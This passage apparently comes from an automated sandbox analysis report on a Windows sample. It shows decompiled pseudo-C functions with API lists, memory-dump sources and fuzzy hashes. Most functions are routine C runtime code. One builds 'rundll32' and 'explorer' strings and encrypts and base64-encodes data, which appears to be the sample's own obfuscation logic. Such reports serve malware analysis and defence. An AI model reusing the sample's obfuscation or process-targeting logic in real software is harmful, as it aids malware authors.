                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                      • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                      • API String ID: 796335831-606320477
                                                                                                                                                      • Opcode ID: 4f94a37edf8ada489d5e5f705fb36280af0f4c8441c331aff08983eb81f312ee
                                                                                                                                                      • Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
                                                                                                                                                      • Opcode Fuzzy Hash: 4f94a37edf8ada489d5e5f705fb36280af0f4c8441c331aff08983eb81f312ee
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00406C60(void* __edi, long _a4) {
                                                                                                                                                      				char _v164;
                                                                                                                                                      				char _v424;
                                                                                                                                                      				int _t17;
                                                                                                                                                      				long _t19;
                                                                                                                                                      				signed int _t42;
                                                                                                                                                      				long _t47;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				signed int _t54;
                                                                                                                                                      				void** _t56;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      
                                                                                                                                                      				_t48 = __edi;
                                                                                                                                                      				_t47 = _a4;
                                                                                                                                                      				_t42 = 0;
                                                                                                                                                      				_t17 = 0x40fa00;
                                                                                                                                                      				while(_t47 !=  *_t17) {
                                                                                                                                                      					_t17 = _t17 + 8;
                                                                                                                                                      					_t42 = _t42 + 1;
                                                                                                                                                      					if(_t17 < 0x40fa90) {
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					break;
                                                                                                                                                      				}
                                                                                                                                                      				_t54 = _t42 << 3;
                                                                                                                                                      				_t2 = _t54 + 0x40fa00; // 0x58000000
                                                                                                                                                      				if(_t47 ==  *_t2) {
                                                                                                                                                      					_t17 =  *0x41079c; // 0x0
                                                                                                                                                      					if(_t17 == 1 || _t17 == 0 &&  *0x40d608 == 1) {
                                                                                                                                                      						_t16 = _t54 + 0x40fa04; // 0x40b658
                                                                                                                                                      						_t56 = _t16;
                                                                                                                                                      						_t19 = E00407250( *_t56);
                                                                                                                                                      						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_t47 != 0xfc) {
                                                                                                                                                      							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                                                                                                                                                      								E00407BD0( &_v424, "<program name unknown>");
                                                                                                                                                      							}
                                                                                                                                                      							_push(_t48);
                                                                                                                                                      							_t49 =  &_v424;
                                                                                                                                                      							if(E00407250( &_v424) + 1 > 0x3c) {
                                                                                                                                                      								_t49 = E00407250( &_v424) +  &_v424 - 0x3b;
                                                                                                                                                      								E004037A0(E00407250( &_v424) +  &_v424 - 0x3b, "...", 3);
                                                                                                                                                      								_t57 = _t57 + 0x10;
                                                                                                                                                      							}
                                                                                                                                                      							E00407BD0( &_v164, "Runtime Error!\n\nProgram: ");
                                                                                                                                                      							E00407BE0( &_v164, _t49);
                                                                                                                                                      							E00407BE0( &_v164, "\n\n");
                                                                                                                                                      							_t12 = _t54 + 0x40fa04; // 0x40b658
                                                                                                                                                      							E00407BE0( &_v164,  *_t12);
                                                                                                                                                      							_t17 = E00408D68( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t17;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406CCD
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,0040B658,00000000,?,00000000), ref: 00406DA3
                                                                                                                                                      • WriteFile.KERNEL32(00000000), ref: 00406DAA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                                                                                      • String ID: ...$<program name unknown>$@A$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                      • API String ID: 3784150691-1647693526
                                                                                                                                                      • Opcode ID: ec561903232ed76a8b5bce49d3094f78bc323a5fdecae60dbafb6eb8c7232f38
                                                                                                                                                      • Instruction ID: 0fb857b455d91a1aa3564d0dd8ff5f06dc914241668c5633d898896f2947ee2a
                                                                                                                                                      • Opcode Fuzzy Hash: ec561903232ed76a8b5bce49d3094f78bc323a5fdecae60dbafb6eb8c7232f38
                                                                                                                                                      • Instruction Fuzzy Hash: 59319472B04218AEEF30EA60DD45FDA776CEF45304F10047BF549B61C0D678EA548A5E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 61%
                                                                                                                                                      			E004081AA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				short* _v28;
                                                                                                                                                      				int _v32;
                                                                                                                                                      				short* _v36;
                                                                                                                                                      				short* _v40;
                                                                                                                                                      				int _v44;
                                                                                                                                                      				void* _v60;
                                                                                                                                                      				int _t61;
                                                                                                                                                      				int _t62;
                                                                                                                                                      				int _t82;
                                                                                                                                                      				int _t83;
                                                                                                                                                      				int _t88;
                                                                                                                                                      				short* _t89;
                                                                                                                                                      				int _t90;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				int _t99;
                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                      				short* _t102;
                                                                                                                                                      				int _t104;
                                                                                                                                                      
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(0x40b6f0);
                                                                                                                                                      				_push(E00405E4C);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t101;
                                                                                                                                                      				_t102 = _t101 - 0x1c;
                                                                                                                                                      				_v28 = _t102;
                                                                                                                                                      				_t104 =  *0x4109f0; // 0x0
                                                                                                                                                      				if(_t104 != 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					if(_a16 > 0) {
                                                                                                                                                      						_t83 = E004083CE(_a12, _a16);
                                                                                                                                                      						_pop(_t91);
                                                                                                                                                      						_a16 = _t83;
                                                                                                                                                      					}
                                                                                                                                                      					_t61 =  *0x4109f0; // 0x0
                                                                                                                                                      					if(_t61 != 2) {
                                                                                                                                                      						if(_t61 != 1) {
                                                                                                                                                      							goto L21;
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_a28 == 0) {
                                                                                                                                                      								_t82 =  *0x410818; // 0x0
                                                                                                                                                      								_a28 = _t82;
                                                                                                                                                      							}
                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                      							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                                                                                                                                                      							_v32 = _t88;
                                                                                                                                                      							if(_t88 == 0) {
                                                                                                                                                      								goto L21;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v8 = 0;
                                                                                                                                                      								E004038A0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                                                                                                                                                      								_v28 = _t102;
                                                                                                                                                      								_v40 = _t102;
                                                                                                                                                      								_v8 = _v8 | 0xffffffff;
                                                                                                                                                      								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                                                                                                                                                      									goto L21;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                                                                                                                                                      									_v44 = _t99;
                                                                                                                                                      									if(_t99 == 0) {
                                                                                                                                                      										goto L21;
                                                                                                                                                      									} else {
                                                                                                                                                      										if((_a9 & 0x00000004) == 0) {
                                                                                                                                                      											_v8 = 1;
                                                                                                                                                      											E004038A0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                                                                                                                                                      											_v28 = _t102;
                                                                                                                                                      											_t89 = _t102;
                                                                                                                                                      											_v36 = _t89;
                                                                                                                                                      											_v8 = _v8 | 0xffffffff;
                                                                                                                                                      											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                                                                                                                                                      												goto L21;
                                                                                                                                                      											} else {
                                                                                                                                                      												_push(0);
                                                                                                                                                      												_push(0);
                                                                                                                                                      												if(_a24 != 0) {
                                                                                                                                                      													_push(_a24);
                                                                                                                                                      													_push(_a20);
                                                                                                                                                      												} else {
                                                                                                                                                      													_push(0);
                                                                                                                                                      													_push(0);
                                                                                                                                                      												}
                                                                                                                                                      												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                                                                                                                                                      												if(_t99 == 0) {
                                                                                                                                                      													goto L21;
                                                                                                                                                      												} else {
                                                                                                                                                      													goto L30;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                                                                                                                                                      												L30:
                                                                                                                                                      												_t62 = _t99;
                                                                                                                                                      											} else {
                                                                                                                                                      												goto L21;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_t90 = 1;
                                                                                                                                                      					if(LCMapStringW(0, 0x100, 0x40b6e8, _t90, ??, ??) == 0) {
                                                                                                                                                      						if(LCMapStringA(0, 0x100, 0x40b6e4, _t90, 0, 0) == 0) {
                                                                                                                                                      							L21:
                                                                                                                                                      							_t62 = 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *0x4109f0 = 2;
                                                                                                                                                      							goto L5;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						 *0x4109f0 = _t90;
                                                                                                                                                      						goto L5;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				 *[fs:0x0] = _v20;
                                                                                                                                                      				return _t62;
                                                                                                                                                      			}
























                                                                                                                                                      APIs
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,0040B6E8,00000001,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004081EC
                                                                                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0040B6E4,00000001,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408208
                                                                                                                                                      • LCMapStringA.KERNEL32(00000000,?,00000100,00000020,00000001,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408251
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408289
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000100,00000020,00000100,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004082E1
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 004082F7
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000100,00000000,00000001,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 0040832A
                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000100,00000000,?,00000000,?,00000100,00000000,00000000,00000001,00000020,00000100,?,00000000), ref: 00408392
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 352835431-0
                                                                                                                                                      • Opcode ID: 0059dfa9e69d9a54c9fa06535160f9e4815a5f92d159834d479f4c8b58195077
                                                                                                                                                      • Instruction ID: 6ff6068f324a42b5108f94410a9797b454fcd57a7a566a74789c166c11932f20
                                                                                                                                                      • Opcode Fuzzy Hash: 0059dfa9e69d9a54c9fa06535160f9e4815a5f92d159834d479f4c8b58195077
                                                                                                                                                      • Instruction Fuzzy Hash: 76517C71500609EBCF218F54CE45AEF7FB9FB89B50F10413AF950B12A0D73A8951DBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1002185A(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                                      				void* _t60;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				void* _t101;
                                                                                                                                                      				void* _t154;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				void* _t158;
                                                                                                                                                      				void* _t171;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					_t150 = __edi;
                                                                                                                                                      					_t106 = __ebx;
                                                                                                                                                      					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
                                                                                                                                                      					_t60 = E100021E0(_t154 - 0xe2a4);
                                                                                                                                                      					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
                                                                                                                                                      					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					L2:
                                                                                                                                                      					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
                                                                                                                                                      					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
                                                                                                                                                      					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
                                                                                                                                                      					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
                                                                                                                                                      					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
                                                                                                                                                      					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
                                                                                                                                                      					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
                                                                                                                                                      					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
                                                                                                                                                      					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
                                                                                                                                                      					_push(_t154 - 0x3d54);
                                                                                                                                                      					_push(_t154 - 0xe294);
                                                                                                                                                      					_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                      					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                      					_t171 = _t156 + 0x7c;
                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                      						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
                                                                                                                                                      						_t171 = _t171 + 0x10;
                                                                                                                                                      					}
                                                                                                                                                      					_t101 = E1000CAC0(_t154 - 0x746c);
                                                                                                                                                      					_t156 = _t171 + 4;
                                                                                                                                                      					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                      				}
                                                                                                                                                      				L5:
                                                                                                                                                      				 *((char*)(_t154 - 4)) = 1;
                                                                                                                                                      				E100011A0(_t154 - 0xe2dc);
                                                                                                                                                      				 *((char*)(_t154 - 4)) = 0;
                                                                                                                                                      				E10003010(_t154 - 0xe2a4);
                                                                                                                                                      				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
                                                                                                                                                      				E100011A0(_t154 - 0xe2c0);
                                                                                                                                                      				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
                                                                                                                                                      				 *((char*)(_t154 - 0x21c)) = 0;
                                                                                                                                                      				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
                                                                                                                                                      				_push( *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                      				_push( *((intOrPtr*)(_t154 + 8)));
                                                                                                                                                      				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
                                                                                                                                                      				_t158 = _t156 + 0x20;
                                                                                                                                                      				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
                                                                                                                                                      					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
                                                                                                                                                      					_t158 = _t158 + 0x10;
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
                                                                                                                                                      				return  *((intOrPtr*)(_t154 - 0x14));
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3854912713-0
                                                                                                                                                      • Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
                                                                                                                                                      • Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
                                                                                                                                                      • Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				char _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v36;
                                                                                                                                                      				char _v292;
                                                                                                                                                      				signed int _v296;
                                                                                                                                                      				char _v300;
                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                      				char _v308;
                                                                                                                                                      				intOrPtr _v312;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				char _t61;
                                                                                                                                                      				char _t62;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				intOrPtr _t102;
                                                                                                                                                      				intOrPtr _t103;
                                                                                                                                                      				char _t115;
                                                                                                                                                      				char _t116;
                                                                                                                                                      				signed int _t118;
                                                                                                                                                      
                                                                                                                                                      				_t132 = __esi;
                                                                                                                                                      				_t131 = __edi;
                                                                                                                                                      				_t101 = __ebx;
                                                                                                                                                      				_t61 = "rundll32"; // 0x646e7572
                                                                                                                                                      				_v24 = _t61;
                                                                                                                                                      				_t102 =  *0x100254e4; // 0x32336c6c
                                                                                                                                                      				_v20 = _t102;
                                                                                                                                                      				_t115 =  *0x100254e8; // 0x0
                                                                                                                                                      				_v16 = _t115;
                                                                                                                                                      				_t62 = "explorer"; // 0x6c707865
                                                                                                                                                      				_v308 = _t62;
                                                                                                                                                      				_t103 =  *0x100254f0; // 0x7265726f
                                                                                                                                                      				_v304 = _t103;
                                                                                                                                                      				_t116 =  *0x100254f4; // 0x0
                                                                                                                                                      				_v300 = _t116;
                                                                                                                                                      				E1000CF20(__edi,  &_v292, 0, 0x108);
                                                                                                                                                      				E1001F150( &_v24,  &_v292,  &_v24);
                                                                                                                                                      				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
                                                                                                                                                      				_t118 = _a4;
                                                                                                                                                      				_v12 = E1000CAC0(_t118);
                                                                                                                                                      				_v296 = 0;
                                                                                                                                                      				_t70 = _v12 & 0x80000007;
                                                                                                                                                      				if(_t70 < 0) {
                                                                                                                                                      					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t70 == 0) {
                                                                                                                                                      					_t120 = _v12 + 8;
                                                                                                                                                      					__eflags = _t120;
                                                                                                                                                      					_v296 = _t120;
                                                                                                                                                      				} else {
                                                                                                                                                      					asm("cdq");
                                                                                                                                                      					_t120 = _t118 & 0x00000007;
                                                                                                                                                      					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
                                                                                                                                                      				}
                                                                                                                                                      				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
                                                                                                                                                      				E1000CF20(_t131, _v8, 0, _v296);
                                                                                                                                                      				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
                                                                                                                                                      				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
                                                                                                                                                      				_t90 = _v296 + 2;
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
                                                                                                                                                      				_push(_v8);
                                                                                                                                                      				E1000CA30(_t101, _t131, _t132, _t90 % 3);
                                                                                                                                                      				return _v312;
                                                                                                                                                      			}

























                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strlen
                                                                                                                                                      • String ID: explorer$rundll32
                                                                                                                                                      • API String ID: 1975251954-2912785976
                                                                                                                                                      • Opcode ID: f6ce6eaccbca0f7d6fa6ae5db2ab446715a916ae53a0c09ee7bb2c187418f45f
                                                                                                                                                      • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                      • Opcode Fuzzy Hash: f6ce6eaccbca0f7d6fa6ae5db2ab446715a916ae53a0c09ee7bb2c187418f45f
                                                                                                                                                      • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E004010E0() {
                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                      				short _v28;
                                                                                                                                                      				short _v32;
                                                                                                                                                      				char _v61;
                                                                                                                                                      				char _v62;
                                                                                                                                                      				char _v63;
                                                                                                                                                      				struct tagLOGFONTA _v64;
                                                                                                                                                      				char _v65;
                                                                                                                                                      				char _v66;
                                                                                                                                                      				char _v67;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				short _v70;
                                                                                                                                                      				short _v72;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                      				struct tagLOGBRUSH _v100;
                                                                                                                                                      				short _t49;
                                                                                                                                                      				struct HFONT__* _t50;
                                                                                                                                                      				intOrPtr _t51;
                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				signed char _t61;
                                                                                                                                                      				short _t67;
                                                                                                                                                      				short _t68;
                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                      
                                                                                                                                                      				memset( &(_v64.lfWidth), 0, 0xf << 2);
                                                                                                                                                      				_t49 =  *"Arial"; // 0x61697241
                                                                                                                                                      				_t67 =  *0x40d1cc; // 0x6c
                                                                                                                                                      				_v72 = 0xe6cc;
                                                                                                                                                      				_v70 = 0x48c6;
                                                                                                                                                      				_v68 = 0x9a;
                                                                                                                                                      				_v67 = 0x35;
                                                                                                                                                      				_v66 = 0xc0;
                                                                                                                                                      				_v65 = 0xf9;
                                                                                                                                                      				_v64.lfHeight = 7;
                                                                                                                                                      				_v63 = 0xe5;
                                                                                                                                                      				_v62 = 0xda;
                                                                                                                                                      				_v61 = 0xb9;
                                                                                                                                                      				_v64.lfWidth.lfHeight = 0x10;
                                                                                                                                                      				_v64.lfItalic = 0x190;
                                                                                                                                                      				_v32 = _t49;
                                                                                                                                                      				_v28 = _t67;
                                                                                                                                                      				_t50 = CreateFontIndirectA( &(_v64.lfWidth));
                                                                                                                                                      				_t82 = _v0;
                                                                                                                                                      				_v64.lfHeight = 0x10;
                                                                                                                                                      				 *(_t82 + 0x18) = _t50;
                                                                                                                                                      				_t51 =  *((intOrPtr*)("Arial")); // 0x61697241
                                                                                                                                                      				_t68 =  *0x40d1cc; // 0x6c
                                                                                                                                                      				_v64.lfWeight = 0x320;
                                                                                                                                                      				_v64.lfFaceName = _t51;
                                                                                                                                                      				_v32 = _t68;
                                                                                                                                                      				 *((intOrPtr*)(_t82 + 0x1c)) = CreateFontIndirectA( &_v64);
                                                                                                                                                      				_v100.lbColor.lbStyle = 0;
                                                                                                                                                      				_v100.lbHatch = 0xffffff;
